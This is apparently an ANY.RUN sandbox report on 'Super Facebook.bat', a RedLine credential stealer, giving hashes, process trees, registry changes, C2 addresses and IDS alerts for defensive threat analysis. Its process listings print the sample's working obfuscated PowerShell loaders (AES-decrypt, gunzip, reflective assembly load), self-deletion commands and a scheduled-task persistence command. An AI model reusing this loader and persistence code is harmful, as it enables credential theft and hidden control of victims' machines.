analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

Super Facebook.bat

Full analysis: https://app.any.run/tasks/6224895d-b143-4c2d-bd22-4a357f1eaf33
Verdict: Malicious activity
Threats:

Remote access trojans (RATs) are a type of malware that enables attackers to establish complete to partial control over infected computers. Such malicious programs often have a modular design, offering a wide range of functionalities for conducting illicit activities on compromised systems. Some of the most common features of RATs include access to the users’ data, webcam, and keystrokes. This malware is often distributed through phishing emails and links.

Malware Trends Tracker     >>>
Analysis date: April 01, 2023, 09:06:21
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
rat
redline
Indicators:
MIME: text/plain
File info: ASCII text, with very long lines, with CRLF line terminators
MD5:

476D87590230E420D07A4D6FD677BD1D

SHA1:

29A2C881B58DD4D9EA40C2208952FDC39627265D

SHA256:

B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2

SSDEEP:

3072:lKEN79wvVZHRTlfG+7nxmiNQuJ7Mhs6gf/Ks+vCN/MG1XLfzz6PM:ld9w7HRT/7nhiu7ks6gfSsrN/nXjzz6U

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 944)
      • powershell.exe (PID: 2884)

    • Starts PowerShell from an unusual location

      • cmd.exe (PID: 1900)
      • cmd.exe (PID: 2044)

    • Application was dropped or rewritten from another process

      • powershell.exe (PID: 1860)
      • powershell.exe (PID: 944)
      • powershell.exe (PID: 2884)
      • Super Facebook.bat.exe (PID: 3364)
      • powershell.exe (PID: 3792)
      • Media_SC.bat.exe (PID: 3284)
      • powershell.exe (PID: 3836)

    • Uses Task Scheduler to run other applications

      • Super Facebook.bat.exe (PID: 3364)

    • REDLINE was detected

      • Media_SC.bat.exe (PID: 3284)

    • Create files in the Startup directory

      • Super Facebook.bat.exe (PID: 3364)

    • Connects to the CnC server

      • Media_SC.bat.exe (PID: 3284)
      • Super Facebook.bat.exe (PID: 3364)

    • Steals credentials from Web Browsers

      • Media_SC.bat.exe (PID: 3284)

    • Actions looks like stealing of personal data

      • Media_SC.bat.exe (PID: 3284)

  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 1900)
      • Super Facebook.bat.exe (PID: 3364)
      • cmd.exe (PID: 2044)
      • Media_SC.bat.exe (PID: 3284)

    • Executable content was dropped or overwritten

      • cmd.exe (PID: 1900)
      • cmd.exe (PID: 2044)

    • Reads security settings of Internet Explorer

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Checks Windows Trust Settings

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Starts itself from another location

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Reads the Internet Settings

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Executing commands from a ".bat" file

      • Super Facebook.bat.exe (PID: 3364)

    • Starts CMD.EXE for commands execution

      • Super Facebook.bat.exe (PID: 3364)

    • Connects to unusual port

      • Media_SC.bat.exe (PID: 3284)

    • Reads browser cookies

      • Media_SC.bat.exe (PID: 3284)

    • Searches for installed software

      • Media_SC.bat.exe (PID: 3284)

    • Reads settings of System Certificates

      • Super Facebook.bat.exe (PID: 3364)

  • INFO

    • The process checks LSA protection

      • powershell.exe (PID: 944)
      • Super Facebook.bat.exe (PID: 3364)
      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 1860)
      • powershell.exe (PID: 2884)
      • Media_SC.bat.exe (PID: 3284)
      • powershell.exe (PID: 3836)
      • wmpnscfg.exe (PID: 3552)

    • Create files in a temporary directory

      • powershell.exe (PID: 944)
      • cmd.exe (PID: 1900)
      • Super Facebook.bat.exe (PID: 3364)
      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 2884)
      • powershell.exe (PID: 1860)
      • cmd.exe (PID: 2044)
      • powershell.exe (PID: 3836)
      • Media_SC.bat.exe (PID: 3284)

    • Reads security settings of Internet Explorer

      • powershell.exe (PID: 944)
      • powershell.exe (PID: 3792)
      • powershell.exe (PID: 2884)
      • powershell.exe (PID: 1860)
      • powershell.exe (PID: 3836)

    • Reads the machine GUID from the registry

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)
      • wmpnscfg.exe (PID: 3552)

    • Reads the computer name

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)
      • wmpnscfg.exe (PID: 3552)

    • Process checks Powershell version

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Checks supported languages

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)
      • wmpnscfg.exe (PID: 3552)

    • Creates files or folders in the user directory

      • Super Facebook.bat.exe (PID: 3364)

    • Reads Environment values

      • Super Facebook.bat.exe (PID: 3364)
      • Media_SC.bat.exe (PID: 3284)

    • Manual execution by a user

      • wmpnscfg.exe (PID: 3552)

    • Reads product name

      • Media_SC.bat.exe (PID: 3284)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
51
Monitored processes
11
Malicious processes
4
Suspicious processes
1

Behavior graph

Click at the process to see the details
drop and start drop and start start drop and start drop and start cmd.exe powershell.exe no specs super facebook.bat.exe powershell.exe no specs cmd.exe powershell.exe no specs powershell.exe no specs #REDLINE media_sc.bat.exe powershell.exe no specs schtasks.exe no specs wmpnscfg.exe no specs

Process information

PID
CMD
Path
Indicators
Parent process
1900C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Super Facebook.bat" "C:\Windows\System32\cmd.exe
explorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
944powershell -w hidden -c #C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\kernel32.dll
c:\windows\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\sechost.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\atl.dll
c:\windows\system32\usp10.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\user32.dll
3364"C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe" function fi($s){$s.Replace('PCgSe', '')}$TvSl=fi 'CPCgSehangPCgSeeExPCgSetenPCgSesiPCgSeoPCgSenPCgSe';$uPOI=fi 'CrPCgSeePCgSeaPCgSeteDPCgSeePCgSecrypPCgSetorPCgSe';$JkhJ=fi 'TraPCgSensPCgSefPCgSeormPCgSeFinaPCgSelBloPCgSecPCgSekPCgSe';$wwku=fi 'RePCgSeadLPCgSeinesPCgSe';$mfAv=fi 'GePCgSetPCgSeCPCgSeurrePCgSentPPCgSerocePCgSesPCgSesPCgSe';$LndS=fi 'FirPCgSestPCgSe';$IOON=fi 'LoaPCgSedPCgSe';$bGTU=fi 'EnPCgSetryPCgSePoPCgSeinPCgSetPCgSe';$VfMB=fi 'FroPCgSemBPCgSeasePCgSe6PCgSe4PCgSeStPCgSeriPCgSengPCgSe';$OqGp=fi 'InvPCgSeokPCgSeePCgSe';function zkztS($GNZBX){$cqmSn=[System.Security.Cryptography.Aes]::Create();$cqmSn.Mode=[System.Security.Cryptography.CipherMode]::CBC;$cqmSn.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$cqmSn.Key=[System.Convert]::$VfMB('UJReuXeqHSNd3qVXNxnQQ97OnOfSBItpzbPC/7v6/1s=');$cqmSn.IV=[System.Convert]::$VfMB('l+XIW/qwWmYbLeGbOZpElw==');$kDTzC=$cqmSn.$uPOI();$Eyxis=$kDTzC.$JkhJ($GNZBX,0,$GNZBX.Length);$kDTzC.Dispose();$cqmSn.Dispose();$Eyxis;}function JacSh($GNZBX){$BBOCs=New-Object System.IO.MemoryStream(,$GNZBX);$tgHik=New-Object System.IO.MemoryStream;$sqTvH=New-Object System.IO.Compression.GZipStream($BBOCs,[IO.Compression.CompressionMode]::Decompress);$sqTvH.CopyTo($tgHik);$sqTvH.Dispose();$BBOCs.Dispose();$tgHik.Dispose();$tgHik.ToArray();}function OVfya($GNZBX,$xwUmA){[System.Reflection.Assembly]::$IOON([byte[]]$GNZBX).$bGTU.$OqGp($null,$xwUmA);}$ImGss=[System.Linq.Enumerable]::$LndS([System.IO.File]::$wwku([System.IO.Path]::$TvSl([System.Diagnostics.Process]::$mfAv().MainModule.FileName, $null)));$MefbR = $ImGss.Substring(3).Split('\');$TlioL=JacSh (zkztS ([Convert]::$VfMB($MefbR[0])));$MTOPM=JacSh (zkztS ([Convert]::$VfMB($MefbR[1])));OVfya $MTOPM $null;OVfya $TlioL $null;C:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\super facebook.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3792"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3364);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSuper Facebook.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2044C:\Windows\system32\cmd.exe /c ""C:\Users\admin\AppData\Local\Temp\Media_SC.bat" "C:\Windows\System32\cmd.exe
Super Facebook.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\winbrand.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
1860"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2044);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSuper Facebook.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2884powershell -w hidden -c #C:\Windows\System32\WindowsPowerShell\v1.0\powershell.execmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
3284"C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe" function Db($N){$N.Replace('VxHqi', '')}$VTDs=Db 'LoadVxHqi';$ADZU=Db 'GeVxHqitCVxHqiuVxHqirrenVxHqitVxHqiProcVxHqiesVxHqisVxHqi';$ZmeI=Db 'TVxHqiraVxHqinVxHqisfoVxHqirmVxHqiFiVxHqinVxHqialVxHqiBlocVxHqikVxHqi';$rSlJ=Db 'CrVxHqieaVxHqitVxHqieDeVxHqicrVxHqiypVxHqitoVxHqirVxHqi';$gMtj=Db 'RVxHqieadLVxHqiineVxHqisVxHqi';$mYMQ=Db 'EntVxHqiryPoVxHqiintVxHqi';$uoPM=Db 'ChaVxHqingeVxHqiExtVxHqieVxHqinsVxHqiionVxHqi';$Dnti=Db 'FirsVxHqitVxHqi';$qgyV=Db 'InvVxHqioVxHqikeVxHqi';$AnzF=Db 'FrVxHqioVxHqimBVxHqiasVxHqie6VxHqi4SVxHqitrVxHqiiVxHqingVxHqi';function eduzr($pdIWt){$EYVPv=[System.Security.Cryptography.Aes]::Create();$EYVPv.Mode=[System.Security.Cryptography.CipherMode]::CBC;$EYVPv.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$EYVPv.Key=[System.Convert]::$AnzF('4UFXnX30OSBg/EjlyQ9fjGhlnmbo5rsEBxBqLZcJ7jk=');$EYVPv.IV=[System.Convert]::$AnzF('gBEgzZW1Gz1oSSSKvbA72w==');$FqDFb=$EYVPv.$rSlJ();$VPjkE=$FqDFb.$ZmeI($pdIWt,0,$pdIWt.Length);$FqDFb.Dispose();$EYVPv.Dispose();$VPjkE;}function uzNjg($pdIWt){$wxxQI=New-Object System.IO.MemoryStream(,$pdIWt);$wduUe=New-Object System.IO.MemoryStream;$SBwAO=New-Object System.IO.Compression.GZipStream($wxxQI,[IO.Compression.CompressionMode]::Decompress);$SBwAO.CopyTo($wduUe);$SBwAO.Dispose();$wxxQI.Dispose();$wduUe.Dispose();$wduUe.ToArray();}function uLmzf($pdIWt,$nzezJ){[System.Reflection.Assembly]::$VTDs([byte[]]$pdIWt).$mYMQ.$qgyV($null,$nzezJ);}$xTaoc=[System.Linq.Enumerable]::$Dnti([System.IO.File]::$gMtj([System.IO.Path]::$uoPM([System.Diagnostics.Process]::$ADZU().MainModule.FileName, $null)));$ouXIZ = $xTaoc.Substring(3).Split('\');$ViRjv=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[0])));$bJeLh=uzNjg (eduzr ([Convert]::$AnzF($ouXIZ[1])));uLmzf $bJeLh $null;uLmzf $ViRjv $null;C:\Users\admin\AppData\Local\Temp\Media_SC.bat.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\users\admin\appdata\local\temp\media_sc.bat.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
3836"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(3284);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMedia_SC.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.14409.1005 (rs1_srvoob.161208-1155)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\user32.dll
2316"C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Super Facebook" /tr "C:\Users\admin\AppData\Roaming\Super Facebook.bat"C:\Windows\System32\schtasks.exeSuper Facebook.bat.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Manages scheduled tasks
Exit code:
0
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Images
c:\windows\system32\schtasks.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
Total events
17 654
Read events
17 588
Write events
60
Delete events
6

Modification events

(PID) Process:(3364) Super Facebook.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3364) Super Facebook.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3364) Super Facebook.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3364) Super Facebook.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3284) Media_SC.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:ProxyBypass
Value:
1
(PID) Process:(3284) Media_SC.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:IntranetName
Value:
1
(PID) Process:(3284) Media_SC.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:UNCAsIntranet
Value:
1
(PID) Process:(3284) Media_SC.bat.exeKey:HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap
Operation:writeName:AutoDetect
Value:
0
(PID) Process:(3552) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05}\{29060388-EB75-4A91-B955-DC18C2D3786B}
Operation:delete keyName:(default)
Value:
(PID) Process:(3552) wmpnscfg.exeKey:HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Media Player NSS\3.0\Events\{29946A26-2048-44CF-8751-F8C9230C4C05}
Operation:delete keyName:(default)
Value:
Executable files
4
Suspicious files
28
Text files
4
Unknown types
4

Dropped files

PID
Process
Filename
Type
3364Super Facebook.bat.exeC:\Users\admin\AppData\Local\Temp\Media_SC.battext
MD5:43D061A5271571B1907684432C97EB74
SHA256:B510310377730BD75296E15C8E2183DC21492BC0DEFDD564B46149642E0D381B
944powershell.exeC:\Users\admin\AppData\Local\Temp\jtovxxln.ht5.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
944powershell.exeC:\Users\admin\AppData\Local\Temp\ybnb0dy3.ux5.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3792powershell.exeC:\Users\admin\AppData\Local\Temp\xwblrke3.iun.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1860powershell.exeC:\Users\admin\AppData\Local\Temp\oufuipal.1xr.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
1860powershell.exeC:\Users\admin\AppData\Local\Temp\u5uerh01.asz.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3284Media_SC.bat.exeC:\Users\admin\AppData\Local\Temp\adjxfyvl.z5k.ps1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
3364Super Facebook.bat.exeC:\Users\admin\AppData\Roaming\Super Facebook.battext
MD5:476D87590230E420D07A4D6FD677BD1D
SHA256:B6EE5CED40C6A82853E8B5543E139254B0AA9C503B670943818B332297293DD2
1900cmd.exeC:\Users\admin\AppData\Local\Temp\Super Facebook.bat.exeexecutable
MD5:EB32C070E658937AA9FA9F3AE629B2B8
SHA256:70BA57FB0BF2F34B86426D21559F5F6D05C1268193904DE8E959D7B06CE964CE
3364Super Facebook.bat.exeC:\Users\admin\AppData\Local\Temp\ng0ssa1d.jqv.psm1binary
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
0
TCP/UDP connections
3
DNS requests
1
Threats
0

HTTP requests

No HTTP requests
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
3284
Media_SC.bat.exe
108.165.242.134:34097
Heymman Servers Corporation
US
malicious
108.165.242.134:7000
Heymman Servers Corporation
US
malicious
149.154.167.220:443
api.telegram.org
Telegram Messenger Inc
GB
malicious

DNS requests

Domain
IP
Reputation
api.telegram.org
  • 149.154.167.220
shared

Threats

PID
Process
Class
Message
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE RedLine Stealer TCP CnC net.tcp Init
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC Activity
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC - Id1Response
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC - Id1Response
Misc activity
ET HUNTING Telegram API Domain in DNS Lookup
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC Activity
3364
Super Facebook.bat.exe
Misc activity
ET HUNTING Observed Telegram API Domain (api .telegram .org in TLS SNI)
3364
Super Facebook.bat.exe
Misc activity
ET HUNTING Telegram API Certificate Observed
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC Activity
3284
Media_SC.bat.exe
A Network Trojan was detected
ET MALWARE Redline Stealer TCP CnC Activity
2 ETPRO signatures available at the full report
No debug info
Interactive malware hunting service ANY.RUN
© 2017-2024 ANY.RUN LLC. ALL RIGHTS RESERVED
ANY.RUN
Reports
Super Facebook.bat